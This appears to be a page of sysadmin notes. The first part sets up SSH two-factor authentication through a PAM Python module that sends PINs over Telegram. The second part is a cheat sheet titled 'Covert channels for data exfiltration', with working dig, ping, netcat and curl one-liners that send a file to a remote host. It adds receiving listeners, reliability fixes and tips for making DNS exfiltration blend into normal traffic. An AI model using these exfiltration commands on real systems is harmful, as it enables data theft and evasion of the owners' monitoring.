# SSH two-factor authentication (pam + telegram)


# apt-get install libpam-python

# grep -m 1 ChallengeResponseAuthentication /etc/ssh/sshd_config
ChallengeResponseAuthentication yes
# UsePAM yes must also be set. The PAM auth stack (and therefore this PIN) only
# runs for keyboard-interactive/password logins: a public-key login skips it
# unless sshd also has "AuthenticationMethods publickey,keyboard-interactive".
# Newer OpenSSH spells the option KbdInteractiveAuthentication.

# cat /etc/pam.d/sshd | grep -B 1 -A 1 authentication
auth requisite /lib/security/pam_python.so /lib/security/telegramPIN.py
# Standard Un*x authentication.
@include common-auth
# NOTE: placed before common-auth, the module generates and sends a Telegram PIN
# for every connection attempt, whether or not the username exists or the
# password is right, so anyone can flood the Telegram channel. Put the
# telegramPIN line after "@include common-auth" if the password should be
# verified before a PIN is sent.

# The module below runs as root inside sshd's PAM stack: keep it and
# /send_telegram_msg.py root-owned and writable by nobody else.
# cat /lib/security/telegramPIN.py
import base64
import hmac
import random
import subprocess

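def pam_sm_authenticate(pamh, flags, argv):
  """PAM auth hook: require a one-time PIN delivered over Telegram.

  Connections whose source address lies inside ``local_network`` are
  accepted without a PIN (the LAN is trusted by design of this setup).
  Everyone else is sent an 8-digit PIN through /send_telegram_msg.py and
  must type it back at the "PIN: " prompt.

  Returns pamh.PAM_SUCCESS for a trusted source or a correct PIN,
  pamh.PAM_AUTH_ERR for a wrong or empty answer, pamh.PAM_AUTHINFO_UNAVAIL
  when the helper script cannot be started (the PIN cannot reach the user,
  so the login cannot succeed), and the pam_result of any pamh.exception
  raised while resolving the user name.
  """
  local_network = '192.168.1.'
  # rhost is whatever sshd reports: an address string, a hostname when
  # UseDNS is on, or None.  Match it as an address *prefix*; the previous
  # substring test also accepted any string that merely contained
  # "192.168.1." somewhere inside it.
  rhost = pamh.rhost or ''
  if rhost.startswith('::ffff:'):
    # IPv4-mapped IPv6 spelling of the same IPv4 source address.
    rhost = rhost[len('::ffff:'):]
  if rhost.startswith(local_network):
    return pamh.PAM_SUCCESS

  # Resolve the user name (prompting if sshd has not supplied one) so the
  # rest of the stack sees it; the value itself is not needed here.
  try:
    pamh.get_user(None)
  except pamh.exception as e:
    return e.pam_result

  # SystemRandom draws from os.urandom; eight independent digits give a
  # fixed-length PIN with leading zeros allowed.
  rng = random.SystemRandom()
  pin = ''.join(str(rng.randint(0, 9)) for _ in range(8))
  b64 = base64.b64encode(('SSH-PIN = ' + pin).encode('ascii')).decode('ascii')
  # NOTE(review): base64 here is obfuscation, not protection -- any local user
  # can read the PIN from the helper's command line (/proc/<pid>/cmdline)
  # while it runs.  Passing it on stdin would close that window, but the
  # helper's interface is not visible in this file, so argv is kept.
  try:
    # close_fds keeps sshd's descriptors out of the helper process.
    subprocess.Popen(['/send_telegram_msg.py', b64], close_fds=True)
  except OSError:
    # Helper missing or not executable: nothing to prompt for.
    return pamh.PAM_AUTHINFO_UNAVAIL

  msg = pamh.Message(pamh.PAM_PROMPT_ECHO_OFF, 'PIN: ')
  rsp = pamh.conversation(msg)
  answer = rsp.resp
  if not answer:
    return pamh.PAM_AUTH_ERR

  # Constant-time comparison; a plain == stops at the first differing
  # digit.  Older interpreters (before 2.7.7) lack compare_digest.
  compare = getattr(hmac, 'compare_digest', None)
  if compare is None:
    compare = lambda a, b: a == b
  try:
    ok = compare(answer, pin)
  except TypeError:
    # compare_digest refuses mismatched types; treat that as a wrong PIN.
    ok = False
  if ok:
    return pamh.PAM_SUCCESS
  return pamh.PAM_AUTH_ERR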

def pam_sm_setcred(pamh, flags, argv):
  """Credential hook: this module manages no credentials, so always succeed."""
  return pamh.PAM_SUCCESS

def pam_sm_acct_mgmt(pamh, flags, argv):
  """Account hook: no account check is performed here; always succeed."""
  return pamh.PAM_SUCCESS

def pam_sm_open_session(pamh, flags, argv):
  """Session-open hook: nothing to set up for this module; always succeed."""
  return pamh.PAM_SUCCESS

def pam_sm_close_session(pamh, flags, argv):
  """Session-close hook: nothing to tear down for this module; always succeed."""
  return pamh.PAM_SUCCESS

def pam_sm_chauthtok(pamh, flags, argv):
  """Password-change hook: the PIN is per-login, there is no token to change; always succeed."""
  return pamh.PAM_SUCCESS

# service ssh restart

References

http://pam-python.sourceforge.net/doc/html/
http://www.linux-pam.org/Linux-PAM-html/Linux-PAM_MWG.html

# Covert channels for data exfiltration


DNS

local# xxd -p -c 16 $file | while read line; do dig @$remote $line. +time=1 +retry=0 & done
# Each 32-hex-digit chunk becomes one DNS label. The queries are backgrounded, so
# they can arrive out of order: drop the "&" (about 1 s per chunk if $remote never
# answers) or prefix each chunk with a sequence number, e.g.
# "xxd -p -c 16 $file | nl -w1 -s. | ...", if the file must be reassembled exactly.
# Querying $remote directly on udp/53 stands out; to blend in with normal
# resolver traffic, query names under a domain whose authoritative server you run.
remote# tcpdump -ni any -Xs 0 "host $remote and udp dst port 53"

ICMP

local# xxd -p -c 16 $file | while read line; do ping -p $line -c 1 $remote; done
remote# tcpdump -ni any -Xs 0 "host $remote and icmp"
# ping -p accepts at most 16 pad bytes (32 hex digits); anything beyond that is
# ignored, so "xxd -c 32" would lose half of every chunk. The filter was
# single-quoted (so $remote never expanded) and lacked the "and" between the
# two primitives.

Raw

local# nc $remote $port < $file
remote# nc -l -p $port
# Some netcat builds (OpenBSD nc) reject -p together with -l; use "nc -l $port"
# there. If the sender does not exit after EOF, add "-q 1" (traditional nc) or
# "-N" (OpenBSD nc). Everything on this channel is plaintext.

HTTP/S

local# curl --data "@$file" http://$remote:$port
local# curl --data "param=`cat $file`" http://$remote:$port
local# curl --header "X-Data: `cat $file`" http://$remote:$port
remote# nc -l -p $port
# A custom header must be "Name: value"; curl drops a -H argument that has no
# colon, so the original "header=..." form sent nothing. Expanding `cat $file`
# into an argument only works for small single-line text: hex- or base64-encode
# it first (xxd -p | tr -d '\n', or base64 -w0). The listener is plain nc, so
# this is HTTP only; HTTPS needs a TLS-terminating listener on $remote.